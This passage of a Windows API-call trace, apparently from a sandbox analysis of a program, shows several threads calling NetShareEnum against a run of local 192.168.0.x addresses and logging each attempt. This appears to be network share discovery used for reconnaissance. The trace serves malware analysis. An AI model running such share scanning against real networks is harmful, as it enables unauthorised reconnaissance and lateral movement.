lpNumberOfBytesWritten=0x361fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.500] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.500] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.501] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x361fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x361fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.504] NetShareEnum (in: servername="\\\\192.168.0.220", level=0x1, bufptr=0x361fedc, prefmaxlen=0xffffffff, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc | out: bufptr=0x361fedc, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc) returned 0x35 [0257.994] SetEvent (hEvent=0x1dc) returned 1 [0257.994] RtlExitUserThread (Status=0x0) Thread: id = 37 os_tid = 0xc24 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.20", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.20", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.20", lpUsedDefaultChar=0x0) returned 14 [0088.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.340] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x375fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x375fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.419] NetShareEnum (in: servername="\\\\192.168.0.20", level=0x1, bufptr=0x375fedc, prefmaxlen=0xffffffff, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc | out: bufptr=0x375fedc, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc) returned 0x35 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.85", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.85", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.85", lpUsedDefaultChar=0x0) returned 14 [0144.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.169] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.169] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x375fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x375fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.174] NetShareEnum (in: servername="\\\\192.168.0.85", level=0x1, bufptr=0x375fedc, prefmaxlen=0xffffffff, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc | out: bufptr=0x375fedc, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc) returned 0x35 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.184", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.184", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.184", lpUsedDefaultChar=0x0) returned 15 [0178.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.438] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.438] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x375fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x375fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.442] NetShareEnum (in: servername="\\\\192.168.0.184", level=0x1, bufptr=0x375fedc, prefmaxlen=0xffffffff, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc | out: bufptr=0x375fedc, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc) returned 0x35 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.232", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.232", cchWideChar=15, lpMultiByteStr=0x1e830ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.232", lpUsedDefaultChar=0x0) returned 15 [0211.205] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x375fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x375fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.460] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.460] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x375ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.460] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.460] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.461] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x375fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x375fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.461] NetShareEnum (in: servername="\\\\192.168.0.232", level=0x1, bufptr=0x375fedc, prefmaxlen=0xffffffff, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc | out: bufptr=0x375fedc, entriesread=0x375fed4, totalentries=0x375fed0, resume_handle=0x375fecc) returned 0x35 [0258.008] SetEvent (hEvent=0x1dc) returned 1 [0258.009] RtlExitUserThread (Status=0x0) Thread: id = 38 os_tid = 0xc28 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.17", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.17", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.17", lpUsedDefaultChar=0x0) returned 14 [0088.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.326] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x389fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x389fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.327] NetShareEnum (in: servername="\\\\192.168.0.17", level=0x1, bufptr=0x389fedc, prefmaxlen=0xffffffff, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc | out: bufptr=0x389fedc, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc) returned 0x35 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.79", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.79", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.79", lpUsedDefaultChar=0x0) returned 14 [0144.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.082] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x389fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x389fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.087] NetShareEnum (in: servername="\\\\192.168.0.79", level=0x1, bufptr=0x389fedc, prefmaxlen=0xffffffff, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc | out: bufptr=0x389fedc, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc) returned 0x35 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.193", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.193", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.193", lpUsedDefaultChar=0x0) returned 15 [0178.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.499] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x389fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x389fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.503] NetShareEnum (in: servername="\\\\192.168.0.193", level=0x1, bufptr=0x389fedc, prefmaxlen=0xffffffff, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc | out: bufptr=0x389fedc, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc) returned 0x35 [0211.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.222", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.222", cchWideChar=15, lpMultiByteStr=0x1e82f6c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.222", lpUsedDefaultChar=0x0) returned 15 [0211.195] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x389fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x389fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.434] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.434] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x389ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.434] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.434] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.434] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x389fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x389fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.438] NetShareEnum (in: servername="\\\\192.168.0.222", level=0x1, bufptr=0x389fedc, prefmaxlen=0xffffffff, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc | out: bufptr=0x389fedc, entriesread=0x389fed4, totalentries=0x389fed0, resume_handle=0x389fecc) returned 0x35 [0258.083] SetEvent (hEvent=0x1dc) returned 1 [0258.083] RtlExitUserThread (Status=0x0) Thread: id = 39 os_tid = 0xc2c [0088.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.18", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.18", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.18", lpUsedDefaultChar=0x0) returned 14 [0088.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.329] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.329] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.329] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.329] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.329] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x39dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x39dfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.329] NetShareEnum (in: servername="\\\\192.168.0.18", level=0x1, bufptr=0x39dfedc, prefmaxlen=0xffffffff, entriesread=0x39dfed4, totalentries=0x39dfed0, 